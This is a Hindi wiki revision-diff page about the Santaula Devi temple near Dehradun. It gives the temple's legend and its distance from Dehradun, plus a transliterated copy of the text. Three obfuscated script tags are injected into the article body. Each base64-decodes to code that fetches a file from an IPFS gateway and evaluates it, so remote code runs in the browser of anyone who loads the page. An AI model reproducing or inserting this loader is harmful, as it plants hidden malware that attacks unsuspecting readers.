Difference between revisions of "संतौला देवी मंदिर देहरादून"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(4 intermediate revisions by 2 users not shown)
Line 2: Line 2:
 
*देहरादून से लगभग 15 किमी दूर स्थित प्रसिद्ध संतौला देवी मंदिर है।  
 
*देहरादून से लगभग 15 किमी दूर स्थित प्रसिद्ध संतौला देवी मंदिर है।  
 
*संतौला देवी मंदिर लोगों के विश्वास का प्रतीक है
 
*संतौला देवी मंदिर लोगों के विश्वास का प्रतीक है
*संतौला देवी मंदिर का बहुत सांस्कृतिक और धार्मिक महत्व है।
+
*संतौला देवी मंदिर का बहुत सांस्कृतिक और धार्मिक महत्त्व है।
 
*इसे शांतला देवी मंदिर के नाम से भी जाना जाता है।  
 
*इसे शांतला देवी मंदिर के नाम से भी जाना जाता है।  
 
*माना जाता है कि जब शांतला देवी को यह एहसास हुआ कि वे मुग़लों का सामना नहीं कर पाएँगी तो उन्होंने हथियार छोड़ कर ईश्वर की पूजा की। उसी समय चारों ओर दिव्य प्रकाश फैला और वे पत्थर की मूर्ति में बदल गयी।
 
*माना जाता है कि जब शांतला देवी को यह एहसास हुआ कि वे मुग़लों का सामना नहीं कर पाएँगी तो उन्होंने हथियार छोड़ कर ईश्वर की पूजा की। उसी समय चारों ओर दिव्य प्रकाश फैला और वे पत्थर की मूर्ति में बदल गयी।
 
*संतौला देवी मंदिर क़िले के बाहर बना हुआ है।  
 
*संतौला देवी मंदिर क़िले के बाहर बना हुआ है।  
 
*कहा जाता है कि शांतला देवी के मूर्ति में बदलने की घटना शनिवार को हुई थी।  
 
*कहा जाता है कि शांतला देवी के मूर्ति में बदलने की घटना शनिवार को हुई थी।  
*मंदिर पहुँचने के लिए पंजाबीवाला से 2 किमी. पैदल चलना होता है।
+
*मंदिर पहुँचने के लिए पंजाबीवाला से 2 किलोमीटर पैदल चलना होता है।
==सम्बंधित लिंक==
+
{{प्रचार}}
 +
==संबंधित लेख==
 
{{उत्तराखंड के पर्यटन स्थल}}
 
{{उत्तराखंड के पर्यटन स्थल}}
  
[[Category:उत्तराखंड]]
 
 
[[Category:उत्तराखंड_के_पर्यटन_स्थल]]
 
[[Category:उत्तराखंड_के_पर्यटन_स्थल]]
 
[[Category:पर्यटन_कोश]]
 
[[Category:पर्यटन_कोश]]
[[Category:विविध]]
+
[[Category:देहरादून]]
 
__INDEX__
 
__INDEX__

Latest revision as of 08:32, 14 June 2011

  • devabhoomi uttarakhand ki rajadhani v uttari bharat ke pashchimottar uttaraanchal rajy mean sthit deharadoon mean santaula devi mandir pramukh paryatan sthal mean se hai.
  • deharadoon se lagabhag 15 kimi door sthit prasiddh santaula devi mandir hai.
  • santaula devi mandir logoan ke vishvas ka pratik hai
  • santaula devi mandir ka bahut saanskritik aur dharmik mahattv hai.
  • ise shaantala devi mandir ke nam se bhi jana jata hai.
  • mana jata hai ki jab shaantala devi ko yah ehasas hua ki ve mugaloan ka samana nahian kar paeangi to unhoanne hathiyar chho d kar eeshvar ki pooja ki. usi samay charoan or divy prakash phaila aur ve patthar ki moorti mean badal gayi.
  • santaula devi mandir qile ke bahar bana hua hai.
  • kaha jata hai ki shaantala devi ke moorti mean badalane ki ghatana shanivar ko huee thi.
  • mandir pahuanchane ke lie panjabivala se 2 kilomitar paidal chalana hota hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>